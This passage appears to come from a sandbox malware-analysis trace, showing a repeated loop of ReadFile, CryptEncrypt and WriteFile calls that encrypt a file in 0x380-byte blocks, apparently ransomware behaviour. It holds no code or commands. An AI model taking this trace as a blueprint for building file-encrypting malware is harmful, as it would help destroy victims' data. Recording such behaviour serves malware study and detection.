lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.970] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.970] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.970] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.970] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.970] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.970] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.970] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.970] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.970] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.970] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.970] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.970] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.970] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.971] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.971] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.971] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.971] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.971] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.971] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.971] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.971] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.971] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.971] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.971] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.971] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.971] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.972] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.972] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.972] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.972] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.972] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.972] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.972] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.972] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.972] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.972] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.972] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.972] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.972] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.973] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.973] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.973] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.973] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.973] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.973] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.973] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.973] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.973] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.973] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.973] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.973] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.973] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.973] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.974] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.974] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.974] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.974] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.974] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.974] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.974] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.974] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.974] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.974] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.974] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.974] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.975] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.975] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.975] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.975] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.975] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.975] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.975] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.975] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.975] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.975] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.975] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.975] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.975] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.975] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.976] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.976] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.976] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.976] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.976] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.976] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.976] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.976] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.976] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.976] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.976] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.976] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.976] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.977] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.977] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.977] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.977] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.977] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) 